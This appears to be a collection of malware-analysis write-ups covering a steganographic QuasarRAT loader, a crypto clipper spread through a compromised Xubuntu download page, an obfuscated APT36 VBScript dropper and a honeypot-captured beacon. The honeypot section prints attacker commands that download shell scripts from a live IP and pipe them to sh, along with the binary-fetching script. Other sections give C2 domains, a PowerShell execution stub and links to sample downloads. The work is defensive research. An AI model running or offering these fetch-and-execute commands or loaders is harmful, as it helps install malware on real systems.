This PNG contains embedded binary data stored inside pixel values (steganography).

The script:

  • reads each pixel,
  • reconstructs byte arrays from RGB values,
  • uses two pixels as payload length markers,
  • extracts the payload portion,
  • decompresses it via GZIP.

The result is a .NET assembly (DLL) extracted directly into memory.

3. Reflective loading of the DLL

The DLL is never written to disk. Instead, it is:

  • loaded directly into memory,
  • executed via .NET reflection,
  • its entry point is invoked (with or without parameters).

This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.

4. Execution of the final malware payload

The final payload, typically a stealer or remote-control module, runs fully in memory.

The PNG image

The PNG image looks like this:

(For security reasons, a watermark is embedded in the displayed version. You can download the original PNG here.)

To extract the payload from the image, we can use a small Python script (included in the GitHub repository).
This produces a file called stage2_payload.bin with the SHA256 hash d6775da94945ff5cbd26a1711f69cecdce981386983d2f504914630639563c36.

A quick VirusTotal scan provides additional details:

VirusTotal classifies the malware as Zusy (also known as Barys).
Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++, to confirm this i’ll take a look into the file with Ghidra.


When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by the ECMA-335 Common Language Infrastructure (CLI) specification.

This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.


I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.

QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.

It is also interesting to examine the domains contacted by the malware.

The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain:

ihatefaggots.cc

This should be considered as an additional IOC.

Analyzing Malware distributed by Xubuntu.org

Yesterday I discovered a malware incident that was distributed via the official Xubuntu website.
There is already a Reddit post that largely corroborates the incident.



Today I’m going to take a closer look at that malware sample.
SHA256: ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.
The sample I analyzed is available on abuse.ch

(Tip for readers: always verify hashes from a trusted source before interacting with a sample.)

After downloading the sample I inspected its file metadata. This sample is not a native Win32 executable with x86 code, it is a .NET assembly. You can usually spot that with file or by looking for the CLR header (IMAGE_COR20) in the PE.

PE32 executable for MS Windows (GUI), Intel i386 Mono/.Net assembly

Concretely: the PE contains managed CIL/IL (Intermediate Language) and only a tiny native stub whose entry point calls _CorExeMain() (from mscoree.dll) to bootstrap the CLR. That means tools like Ghidra will show only a stub at the PE entry (the real logic lives in CLR metadata streams such as #~, #Strings and #Blob) and will not produce decompiled C# by default.

This pattern is typical for C#-based loader/dropper families. They often present a legitimate UI (in this case “SafeDownloader”) but hide malicious actions such as:

  • anti-VM / anti-debug checks
  • writing/extracting an encrypted payload to disk
  • creating persistence via registry autostart entries

For analysis I use ILSpy to decompile the managed code, Ghidra only shows the PE boot stub; the real logic is in the managed metadata and IL.

I decompiled the sample using ILSpy (CLI) with:

~/.dotnet/tools/ilspycmd -o ./decomp_output ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.exe

Result:

ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.decompiled.cs

After decompilation we get the Decompiled C# files the code I used for analysis is available on my GitHub.

The program is a WPF GUI wrapper (SafeDownloader) that social-engineers the user by showing Ubuntu/Xubuntu ISO links. When the user clicks Generate, the app calls an internal routine (named W.UnPRslEqVw() in the decompiled code) that is the real malware routine executed in the background.


Malware behavior (detailed)


Anti-analysis & sandbox evasion.

The loader first performs anti-analysis checks:

  • Debugger detection: Debugger.IsAttached and native IsDebuggerPresent() via kernel32.
  • Virtualization detection: uses WMI (ManagementObjectSearcher) to query system manufacturer/model and looks for keywords such as VMware, VirtualBox, QEMU, Parallels, Microsoft Corporation (common in VM images).

If any probe indicates a debug/VM environment, the program calls Environment.Exit(0) and quits, preventing payload execution in sandboxes.


API patching / self-modification

Self-modification / in-memory API patching:

The code modifies bytes in loaded system libraries (e.g. kernel32.dll and ntdll.dll). One patch replaces instructions with 0xC3 (a RET) to neuter functions (for example to alter the behavior of Sleep/delay functions used by sandboxes).
Another patch wrtes attacker-supplied bytes (XOR-decrypted) into memory

This is effectively inline hooking / API patching and can alter the behavior of timing/registry functions or attempt to disable runtime hooks that monitoring software or AV products use.


Dropper

The loader drops a second-stage executable:

CreateDirectoryNative(text2);
WriteFileNative(text3, data);
MoveFileNative(text3, text4);
SetAttributesNative(..., attributes);
  • creates a folder under %APPDATA% (via Environment.SpecialFolder.ApplicationData),
  • writes a Base64-encoded blob (then XOR-decoded with key 0xF7) into a .tmp file,
  • renames the .tmp to .exe, and sets file attributes (hidden/system) via native calls.

These helpers correspond to CreateDirectory, CreateFile/WriteFile, MoveFile, and attribute-setting wrappers in the code.


Registry persistence

SetRegistryPersistence(text4, regPath);

The sample writes an autostart entry into the registry using low-level APIs (NtSetValueKey from ntdll and RegOpenKeyEx from advapi32) to store a randomly generated value name with the path to the dropped EXE. Because it writes directly via native system calls (instead of higher-level wrappers), this may be an attempt to confuse or bypass some detection mechanisms that watch common API usage.


Execution & single-instance check

Before launching the dropped executable the loader checks whether a process with the same name is already running. If it is not, the loader starts the dropped binary, this avoids multiple simultaneous instances.


UI deception

The WPF UI displays legitimate Ubuntu download links to build trust. The user sees nothing suspicious while the loader writes the payload to disk, establishes persistence, and executes the dropped binary in the background.


Extracting and decoding the dropped payload

As we can see here, there is another Base64-encoded and XOR-obfuscated payload (XOR key = 247 / 0xF7) stored in the variable data:

I exported the Base64 blob to dropper_isolated.b64 and decoded + XOR-decoded it with:

python3 -c 'import base64; import sys; data = base64.b64decode(open("dropper_isolated.b64").read()); data = bytes([b ^ 0xF7 for b in data]); open("payload.bin","wb").write(data)'

The result payload.bin is a new PE native executable (x86 machine code), not a .NET assembly

I uploaded that binary to VirusTotal for a quick scan:

VirusTotal flags the payload as malicious and indicates that it is a cryptocurrency clipper, malware that monitors the Windows clipboard for crypto wallet addresses and replaces them with attacker-owned addresses so funds are redirected to the attacker’s wallet. With this classification we can pivot to a deeper static analysis (I used Ghidra for the native PE).

The native binary is small and relatively easy to analyze:

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData) a stronng indicator of clipper behavior.

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData) a strong indicator of clipper behavior.
I navigated to the function that implements these calls (named FUN_1400016b0 in my Ghidra session).


Clipboard routine overview.
The function reads the Windows clipboard:

  • opens the clipboard and calls GetClipboardData(CF_TEXT),
  • validates that the clipboard bytes are text and contain only characters typical for wallet addresses (alphanumeric, : or _)
  • then performs prefix checks to identify the coin type.

Prefix checks & coin type mapping.
The malware performs a series of prefix checks to detect the wallet type. From the decompiled logic the mapping is:

Bitcoin:
(*pcVar4 - 0x31U & 0xfd) == 0 oder strncmp(pcVar4, &DAT_140004034, 3)` | (1 / 3...)

Litecoin:
strncmp(pcVar4, &DAT_14000402c, 4) oder (*pcVar4 + 0xb4U) < 2

ETH:
strncmp(pcVar4, &DAT_140004028, 2) → "0x"

DOGE:
cVar1 == 'D'

TRON:
cVar1 == 'T'

XRP:
cVar1 == 'r'

Where to find the addresses:

For each coin type the malware assembles the attacker’s address from two parts:

  • several 32-bit constants (_DAT_140004100, _DAT_140004104, …)
    eight 4-byte words = 32 ASCII characters (little-endian dword representation)
  • a short tail derived by XOR-ing bytes taken from another data blob (e.g. DAT_0x1400031c0) with 0x15
    The tail length varies (commonly 2–10 bytes depending on coin), and it completes the address (including checksum)


You can verify a single dword with Python:

python3 -c "import struct; print(struct.pack('<I', 0x71316362).decode('ascii'))"

The result:

bc1q

So the first dword decodes to bc1q, the signature prefix of a Bech32 Bitcoin address.

This is how i build the tail by merging the byte chunks:

The 32-character string obtained from the dwords is only the first part. The function then computes additional tail bytes by XOR-ing bytes from a separate data region (e.g. DAT_1400031c0) with 0x15 and appends them.
Those tail bytes complete the address (including checksum).
If you only decode the dwords, the address will fail checksum validation, you must XOR-decode and append the tail bytes to get a valid address.


Full address assembly (summary)
The malware writes eight 32-bit constants (32 ASCII chars) and then fills a small tail array with bytes computed as DAT_src[i] ^ 0x15 (tail length varies). The full address is dword_ascii + xor_tail.
It then GlobalAllocs a clipboard buffer and calls SetClipboardData(CF_TEXT, ...) to replace the clipboard contents.



To recover the tail bytes:

dump the bytes at the VA (e.g. 0x1400031c0) with a binary tool (I used radare2; you can also use Ghidra or xxd), for example:

76 78 25 2D 60 64 7D 23 25 63 

XOR each raw byte with 0x15 (the deobfuscation key embedded in the code). You can do this in CyberChef: From Hex -> XOR (key: 15 hex) -> To String.

Output:

cm08uqh60v

Appending that to the 32-char dword string yields the full Bech32 address:

bc1qrzh7d0yy8c3arqxc23twkjujxxax + cm08uqh60v = bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v

I applied the same method to other coin branches and extracted the following attacker addresses from the binary.

Extracted addresses:
I applied the same method to other coin branches and extracted the following attacker addresses from the binary:

  • Bitcoin (Bech32): bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v
  • Litecoin: LQ4B4aJqUH92BgtDseWxiCRn45Q8eHzTkH
  • Ethereum / BSC style (hex): 0x10A8B2e2790879FFCdE514DdE615b4732312252D
  • Dogecoin: DQzrwvUJTXBxAbYiynzACLntrY4i9mMs7D
  • Tron (TRX): TW93HYbyptRYsXj1rkHWyVUpps2anK12hg
  • XRP (Ripple): r9vQFVwRxSkpFavwA9HefPFkWaWBQxy4pU
  • Cardano: addr1q9atfml5cew4hx0z09xu7mj7fazv445z4xyr5gtqh6c9p4r6knhlf3jatwv7y72deah9un6yettg92vg8gskp04s2r2qren6tw

These are the final wallet addresses embedded in this sample (per the static reconstruction). I didn’t find any additional interesting functionality in the binary beyond the dropper/clipper behavior.


TL;DR

I found a C# WPF loader distributed via an Xubuntu download page that drops a native clipper payload.
The loader includes anti-VM and anti-debug checks, in-memory API patching, drops and runs a second-stage PE, and the second stage is a clipboard clipper that replaces wallet addresses with attacker-owned addresses.
I statically reconstructed the attacker wallets from embedded dwords + XOR tails and found several addresses for BTC, LTC, ETH, DOGE, TRX, XRP and Cardano. No transactions were observed at the time of analysis.


A short critique; why the threat actor did a surprisingly poor job despite compromising xubuntu.org

It’s striking how many basic operational security and quality of work mistakes this actor made, mistakes that turned what could have been a high-impact supply-chain compromise into a relatively easy forensic win for analysts.

Concrete failures observed

  • Amateur packaging: shipping a ZIP that claims to contain a torrent but actually contains an .exe and a tos.txt is a glaring red flag. That mismatched user experience (and the presence of an executable in a “torrent” download) makes the payload obvious to even casual users and automated scanners.
  • Sloppy metadata: the tos.txt claims “© 2026 Xubuntu.org” while it’s 2025. Small details like anachronistic timestamps or incorrect copyright years are low-effort giveaways that something is off.
  • Poor obfuscation / easy static recovery: the attacker embedded wallet strings as readable dwords plus simple XOR tails. Those artifacts were trivially reconstructable with basic tooling (radare2/CyberChef/Python). Even the XOR keyss were visible in the decompiled code. That means the malicious addresses, the primary goal of the clipper were recoverable without dynamic execution.
  • Malformed or inconsistent artifacts: some extracted addresses failed checksum validation (or appeared intentionally malformed). That suggests rushed assembly, faulty encoding, or placeholders left in again lowering the bar for detection and denying the attacker guaranteed success.
  • Over-reliance on a single trick: using a compromised site to host a ZIP is effective in general, but the actor did not sufficiently hide operational traces nor build fallback delivery strategies. When defenders inspected the file, the entire chain unraveled quickly.

Why these mistakes matter

  • They reduced the attacker’s window of opportunity. Instead of a stealthy supply-chain drop that could reap long-lived infections, the compromise was noisy and trivially triaged.
  • They made attribution and indicator extraction easy: embedded addresses, simple XOR keys, and clear code paths gave analysts immediate IoCs (wallets, hashes, strings).
  • They increased the chances of swift remediation by the vendor and faster takedown by infrastructure providers.

Final thought
The actor clearly reached a valuable target, the official download infrastructure, but their execution quality was low. That combination (high opportunity + poor tradecraft) is exactly what defenders want: an incident with high signal and relatively low analytical cost. The silver lining here is that sloppy attackers give security teams the evidence they need to respond quickly and to harden distribution chains for the future.

APT36 – “Abaris” Deobfuscating VB Dropper


I recently discovered a sample attributed to the threat actor APT36 (“Transparent Tribe”) on MalwareBazaar.
APT36 (aka Transparent Tribe) is a Pakistan-aligned cyber-espionage group that has been active since at least 2013 and is primarily focused on intelligence collection against targets in South Asia (government, military, diplomatic and research organizations in India and Afghanistan)
The group is known for tailored phishing campaigns and diverse staging techniques (weaponized documents, malicious installers and platform-specific lures), and has a history of delivering custom backdoors and RAT families such as variants of Crimson/Eliza-style malware.
Recently observed activity shows the actor expanding its toolset and delivery methods (including Linux desktop-lures and cloud-hosted payloads), which underlines the need to treat seemingly innocuous artifacts (obfuscated scripts, shortcut files, or odd AppData/Temp files) as potentially dangerous.


The sample turned out to be a heavily obfuscated VBScript. In this post I will walk through the manual deobfuscation steps I performed.
The SHA256 hash of the file is “d35f88dce5dcd7a1a10c05c2feba1cf478bdb8a65144f788112542949c36dd87”

I first uploaded the file to virustotal. It has been uploaded the first time yesterday (18th of October 2025).
Some AV systems already detect the file as malicious.

(note: I call this sample “Abaris” because the dropper decodes part of its payload and writes it into a file named Abaris.txt, which is later used for execution.)

If you want to download the sample or my cleaned copy, you can find them here: https://github.com/Mr128Bit/apt-malware-samples/tree/main/Pakistan/APT36/Abaris

Original filename: Pak_Afghan_War_Impact_on_Northern_Border_India.vbs. I made a copy and renamed it to ap3.vbs for analysis.

When opening the file, you immediately notice a lot of Danish-looking comments/words scattered through the source. These are purely noise, they are there to hinder analysis and evade signature detection. But underneath the noise we can still find Visual Basic constructs that we want to extract.


We can filter out those comment lines very easily.

grep -v "^'" apt33.vbs | sed '/^[[:space:]]*$/d' > apt33_clean.vbs

The output looks much cleaner now, clear VB structures are visible, although the script remains heavily obfuscated.

The next step is to remove additional noise by deleting variables or code blocks that are only used in initialization and never referenced later.

After cleanup, the following code remains:

This is already much tidier. We identified three functions of interest: Crocodilite, Subskribenten, and Cashoo. They are small and not deeply obfuscated, so we can determine their purpose fairly quickly. It’s often useful at this stage to rename obfuscated variables and functions to meaningful names.

Crocodilite

This function creates a text file and writes the passed string into it. In this sample it is used to write the content of the variable tendrilous into Abaris.txt.

' ORIGINAL
Sub Crocodilite(Tudemiklens, Fissuriform)

    Dim Sinh, Galactometer
    Set Sinh = CreateObject("Scripting.FileSystemObject")
    Set Galactometer = Sinh.CreateTextFile(Fissuriform, True)
    Galactometer.Write Tudemiklens
    Galactometer.Close

End Sub
' ADJUSTED
Sub write_to_file(text, path)
    Dim fileSysObj, file
    Set fileSysObj = CreateObject("Scripting.FileSystemObject")
    Set file = fileSysObj.CreateTextFile(path, True)
    file.Write text
    file.Close

Subskribenten

This is a simple wrapper that executes a command via WScript.Shell. It’s used to invoke the payload that was written to disk.

' ORIGINAL
Set Plenicorn = CreateObject("WScript.Shell")
...
Function Subskribenten(Tautegorical)

    Call Plenicorn.Run(Tautegorical,0)

End Function

' ADJUSTED
Set shell = CreateObject("WScript.Shell")
...
Function Execute(payload)
    Call shell.Run(payload,0)

Cashoo

A decoder routine. It extracts characters at fixed intervals from a masking string (i.e. it removes padding characters and reconstructs the hidden string). This is a classic technique to hide URLs, commands or other sensitive strings from static signature scanners.

' ORIGINAL
Function Cashoo(ByVal Microsphaeric)

    for i = 4 to len(Text) Step 4
    ' Mid(string, start, length) extract a specified amount of characters from a string
    Cashoo = Cashoo & Mid(Text,i,Alenlang) 

    Next


End Function

' ADJUSTED
Function ExtractEveryFourthChar(ByVal Text)

    for i = 4 to len(Text) Step 4
    ' Mid(string, start, length) extract a specified amount of characters from a string
    ExtractEveryFourthChar = ExtractEveryFourthChar & Mid(Text,i,Alenlang) 

    Next


End Function


I implemented a Python equivalent to decode the payload. After I finished the script I fed several encoded strings from the VB file through it.
Additionally i loaded every string found for the variable “tendrilous” into a separate file “tendrilous.txt” for decoding purposes.
You can view the script here.

Result:

$Commonplacer=[char]34;
$Rasping=$env:tmp;
$Unbefringed=gc $Rasping\Abaris.txt -Delimiter $Commonplacer;
$Emydes=$Unbefringed.'substring'(4696-1,3);
.$Emydes $Unbefringed

The Python routine works as intended: it reads Abaris.txt, extracts a three-character command name from a specific offset, and would invoke that command with the file content as parameter i.e., dynamic code execution.

I also implemented a Python equivalent for this routine; the script is available in the repository.

After running my script, the payload output looks like this:

At first glance the output looks nasty, but it can be disentangled. Don’t panic. I applied line breaks and indentation in the right places to make control flow and function calls visible.

To make the code more readable I used the following commands:

sed -i 's/;\$/;\n\$/g' "$1"
sed -i 's/;Cenogenesis/;\nCenogenesis/g' "$1"
sed -i 's/{/{\n/g' "$1"
sed -i 's/}/\n}\n/g' "$1"
sed -i 's/;function/;\nfunction/g' "$1"
sed -i 's/;while/;\nwhile/g' "$1"

The result now looks much more promising:

There is still some noise embedded in a few places. We also discovered repeated calls to the Roberts function with additional encoded strings. I wrote a Python helper to extract those strings from the file and decode them with the same Roberts / Cashoo logic.

When we run that pipeline and merge the output under the previous deobfuscated view, we obtain the following consolidated result:

Final Script

This is the final deobfuscated dropper script. From it we can conclude the following:

  • The script repeatedly attempts to download a remote file from a suspicious URL and save it locally.
  • Once the file is available, it reads parts of it, Base64-decodes contained data, and reconstructs executable PowerShell code.
  • Finally, it executes that decoded code dynamically (via dot-sourcing / Invoke-Expression style execution).
    This is a classic loader / bootstrapper pattern for delivering secondary stages of malware.

There are some formatting glitches in the decompiled output that likely arose during processing, but the overall intent is clear.

The dropper notably points at hxxps[://]zohmailcloud[.]com//cloud/Assholes[.]psm as one of the remote payload locations. I could not retrieve the file, the URL is no longer reachable but I did find a Twitter post referencing the file with MD5 7a5fe1af036b6dba35695e6d4f5cc80f.

If I manage to acquire the remote artifact later, I will write a dedicated follow-up article with a full 2nd-stage analysis.


Whisper – Interesting Sandbox evasion?


In the past few days I found something fairly interesting in my sandbox. An attacker attempted to install malware, and the initial analysis led me a bit irritated. The attacker used several techniques to prevent delivering the payload to sandboxes. In this post I only show excerpts; I also published a repository on GitHub that contains the full artifacts.

Quick overview of the key facts:

Affected service: SSH
Honeypot: Cowrie
Attacker IP: 31.170.22.205
Commands executed: (see snippet below)

wget -qO- http://31.170.22.205/dl401 | sh
wget -qO- http://31.170.22.205/dl402 | sh
wget -qO- http://31.170.22.205/dl403 | sh
wget -qO- http://31.170.22.205/dl404 | sh
wget -qO- http://31.170.22.205/dl405 | sh
wget -qO- http://31.170.22.205/dl406 | sh
wget -qO- http://31.170.22.205/dl407 | sh
wget -qO- http://31.170.22.205/dl408 | sh

The attacker tried to download a shell script. It looks like this:

cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv5
chmod +x whisper.armv5
./whisper.armv5 410
cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv6
chmod +x whisper.armv6
./whisper.armv6 410
[...]


The script downloads several binaries, sets execute permissions on them, and then runs them. I tried to download those binaries myself and, oddly, every file had the exact same hash. Inspecting the file metadata revealed they are Windows executables.

I uploaded the file to VirusTotal for a quick look.

The file turned out to be Microsoft’s calc.exe, the standard Windows Calculator app. We can verify this by computing the file hash of calc.exe on a Windows machine:

That gives us confirmation. Since the attacker had already registered with our honeypot, I then attempted to download the files from the honeypot IP, which worked as expected. The attacker deliberately prevents his actual payloads from being easily analyzed by serving them only to selected targets.

Here’s a table of the downloaded binaries (click to open)

You can download them for analysis purposes here.

filenamesha256
whisper.aarch645f7dff5b5bdc2a12506cfb771e94b6ea26fec8a78f65cf927f361a39322036f4
whisper.aarch64be7a2af6f8c55bfc6d0bb259b4df37641cfb0dc9a1c94e0955784cfd9b34dc08ef
whisper.arcle750dc92038d168aa088997ea982aadf1d455ac4bc89332916a576117273610f3069f
whisper.arclehs383611fb87865bd967b6a1b2c3450e68cec14ec90abd9a790147e1544896e7b624
whisper.armv458189cbd4e6dc0c7d8e66b6a6f75652fc9f4afc7ce0eba7d67d8c3feb0d5381f
whisper.armv51d51c313c929d64c5ebe8a5e89c28ac3e74b75698ded47d1bc1b0660adc12595
whisper.armv690bf143a03e0cb6686c32a8a77dbdad6a314a16b7991823f45f7d9cb22ba51bc
whisper.armv72679b37532e176d63c48953cb9549d48feb76f076222cb6502034b0f72ca7db1
whisper.i686326952154ef5a81c819d67f9408e866af5fe2cdb3024df3ef1d650a9932da469
whisper.m68k0f1fd9f0a99693ec551f7eb93b3247b682cb624211a3b0c9de111a8367745268
whisper.mipsd37b334ec94b56236dc008108d4a9189019f1849fb010dcf08cfcf1a7d199b53
whisper.mips641afcdc3210b47356a0f59eeffbc2f7be22c1dd7aa2cc541c0eb20db29da8280e
whisper.mips64lefa96cf3b0022711627b97d569f0c6e28cfd62e7051fdce3f0165f8dd5c4ec760
whisper.mips64len3231f781726cc8cfc002b847fc0f05a7e28ebecea95f5a03b1cdeb63cce3e9ed8c
whisper.mips64n323615d10d1ef6e57b66aa653b158cd8d57166d69cbc4c90c2b7b9dd29820fcc64
whisper.mipsleb4658234a5c300bce3fe410a55fc87a59e4be7d46f948eaff389c4c16016afaa
whisper.powerpc440fpff08d2c7f8b5679add11dd4a297dd40a0d597e92e307ccd9c0d36366b59e3c6f
whisper.powerpc64e5500af7893318f1fe0d60cff62dbebe434e5f8c42bf1b338db23858177e880894574
whisper.powerpc64e65007234970698fab486e210a65aa2a3d3daebd3eebcf4bf016e9670fa725c07d76a
whisper.powerpc64lepower890f5ccd40e0f737eb40dcf292f202c7c70f1cdc2d33bd6718c0b286007f3ce24
whisper.powerpc64power8938205ed2f664fc330e20580799445182ba840672ef8bd75ae7629e07a460a79
whisper.powerpce300c3b2b811bbfe06d0edba85e0b0d42dbffb3714dee5bdd44426a1cb4589874d3234
whisper.powerpce500mcc43f32a066112fd87f43895515d27116e40688ae47b02ce0a5b379672830a136
whisper.riscv3261db3883d792b518450a4a67cfaa4d14baec59239a967ffb30c7a116a39f00e6
whisper.riscv641a60918639c961f6814f4dc74751a926361841b66c837d544697be1d3f42594e
whisper.sh43ac847bc1351ea5275d30cf9186caf607021d7f1da1a4cafeff6886b87844f36
whisper.sparc9033caaa07477bbed8ccd9f130fd8353a81143db44555b734ed1547ef368a8dd
whisper.sparc6400a290ee2458e38a0ec78be1414f651612c51831ff741cb40d5c6a11b29a6d7c
whisper.x644dd0005c6e6d4eca722ed02fec17a689828754a66a107272c5cd62f2fec478e1

For my analysis I’ll focus on the file whisper.x64.


It’s a stripped ELF binary, a binary that has had debugging symbols and symbol names removed. That makes analysis a bit harder, but not impossible. First step: upload the file to VirusTotal.

This was the first submission of the file on VirusTotal, so there is no historical data. Several scanners flagged the binary as a DDoS agent. To find out what it actually does at runtime, I opened it in Ghidra and started looking at functions. First I checked the strings embedded in the binary.


Already we can see some interesting strings, for example:

DEFINED0040a000s_31.170.22.205_0040a000ds “31.170.22.205”“31.170.22.205”string14false
DEFINED0040a012s_/add.php?v=%u&a=%s&o=%u&e=%u_0040a012ds “/add.php?v=%u&a=%s&o=%u&e=%u”“/add.php?v=%u&a=%s&o=%u&e=%u”string29false
DEFINED0040a050s_/ping.php?v=%u&a=%s&e=%u&c=%u_0040a050ds “/ping.php?v=%u&a=%s&e=%u&c=%u”“/ping.php?v=%u&a=%s&e=%u&c=%u”string30true

From these strings we can infer a few capabilities:

  • add.php: registers the client at the C2 server
  • ping.php: sends a ping / heartbeat to the C2 server

Next I examine syscalls to get a clearer picture of the binary’s behavior.
If you want to get an overview of x64 syscalls, you can find them here.

0x31 is the syscall number for sys_bind, so we can infer socket-related functionality. I renamed the function to socket_bind in Ghidra (right-click > Rename Function) and then checked the incoming calls to see where it is used.

After jumping to function FUN_004012b1 we see the following code:

To bind a socket via syscall we need to look at the sockaddr_in layout for x64:

struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to
};

Offset 0 (2 bytes): sin_family (2 / AF_INET)
Offset 2 (2 bytes): sin_port – this is where param_1 lands
Offset 4 (4 bytes): sin_addr – here it’s 0 (INADDR_ANY)

So local_28 corresponds to sin_family, local_24 to sin_addr, and local_26 to sin_port. I renamed the variables accordingly and gave the function the name create_socket.

FUN_004036d3 likely creates the socket. We can confirm that by searching inside it for syscall 0x29 (which is sys_socket). That matches, I renamed that function and fleshed out the code.

This confirms our assumption, so I can also give this function a name and complete the code as far as possible.

We still didn’t know which port this socket uses, so I looked at incoming references and found it’s called only from FUN_00401020.

That function is invoked right after the entry point, it’s effectively main. From the line iVar2 = create_socket(0x5d15); we can infer the port. 0x5d15 in the binary is not the final port number: it’s an unsigned short that gets converted with htons from host byte order to network byte order.

whisper > printf "%d\n" $(( ((0x5d15 & 0xff) << 8) | ((0x5d15 >> 8) & 0xff) ))
5469

You can convert it in bash or compute by hand: because htons swaps the two bytes on little-endian hosts, 0x5d15 becomes 0x155d, which is 5469 in decimal. This is a common pattern used, for example, to avoid running two copies of the malware, but it could also be used as a communication channel. To check that, I searched for the sys_listen syscall (0x32). There is no listen syscall in the binary, so it’s safe to assume this is an execution lock rather than a listening server. The decompiled code also confirms this.

iVar2 is the return status of the socket creation; if iVar2 == -1 socket creation failed and the program exits.

Now let’s look more closely at the block of code that follows a successful socket creation. I’ll skip FUN_0040123 and FUN_00401246 because they only initialize and destroy a buffer, they don’t add relevant functionality.

To understand the logic I examined four helper functions: FUN_0040120a, FUN_004013c6, FUN_004014e2, and FUN_00404634. I started with FUN_00404634 because it has the most incoming references.

This one is most likely a sleep function. If param_1 == 0 nothing happens, that’s typical for sleep wrappers. If param_1 != 0, the routine calls into the kernel through several helper calls and performs a timed wait.

Inside it calls FUN_00404f1f(0x11, 0, local_28), that’s a wrapper for a syscall. The parameter 0x11 is the syscall we care about; on x86-64 that’s sys_rt_sigtimedwait. rt_sigtimedwait lets you wait for signals with a timeout, so the code can sleep while still being able to respond to signals (from another thread, an IPC, or a realtime signal). Many analysis and monitoring tools hook libc sleep functions like nanosleep(); by using direct syscalls the malware can bypass those hooks and make runtime analysis harder.

After that the code performs what looks like a timer or remaining-time check, it computes elapsed time or remaining time and returns that value. I renamed this helper to sleep for clarity.


FUN_0040120a

FUN_0040120a uses syscall 0xc9, which is a time-related syscall. The function measures elapsed time across a 10-second delay, a typical sandbox-evasion trick. The code checks the difference and only executes the following block if the delta indicates the sleep actually occurred. I renamed this to time_passed_check.


FUN_004013c6

FUN_004013c6 is straightforward: it performs a GET request to the C2’s add.php. That is the client registration step. The GET parameters v, a, o, and e map roughly as follows:

  • v: fixed value
  • a: CPU architecture (agent string)
  • o: fixed value
  • e: the value passed to the binary at execution time

I renamed the function to add_client.


FUN_004014e2

The last function, FUN_004014e2, is similar to add_client. It sends a ping to the C2 server and returns a boolean indicating success or failure. I renamed it ping_cnc.

I’ve now analyzed and named all four helper functions used by FUN_0040125c.
Here’s the result:

Step-by-step:

First, the binary checks the result of the time-check. If that check passes, it registers the client with the C2.

Afterwards, the binary pings the C2 server every 300 seconds. The loop contains a counter that runs 576 iterations in total. The full runtime is therefore limited to exactly 48 hours (300 * 576 = 172,800 seconds = 48 hours). I named the overall routine add_and_ping.

Looking into the main function, we now have a structure that ties everything together:

Note: I intentionally didn’t discuss every single helper; I renamed the lesser functions for clarity but didn’t dig into those that aren’t relevant to this write-up.


Conclusion

The binary’s functionality is limited. On startup it runs a time-difference check designed to detect sandboxing, using sys_rt_sigtimedwait to make sleep detection harder. If the sample concludes the timing check is okay, it registers with the C2 and then pings the C2 every five minutes for 48 hours. This is a beacon-only sample with no additional backdoor capabilities in the analyzed build.

Interpretations

Because the attacker used multiple techniques to keep their real binaries out of standard analysis, this likely serves as a sandbox-evasion measure. The operator can watch the incoming pings from infected machines and, after confirming persistent, consistent check-ins over the 48-hour window, choose targets for a follow-up payload deployment. That prevents premature sandboxing and analysis of the actual payloads.

An argument against that theory is the lack of any attempt to establish persistent access in this sample, that would make later deployment harder if defenders notice and block the operation early.

Another hypothesis is that the operator collects telemetry to detect whether the binary is being detected and if it survives for a desired runtime. That would explain the lack of persistence attempts, but I consider this less likely because there are more efficient ways to perform that kind of telemetry.

References: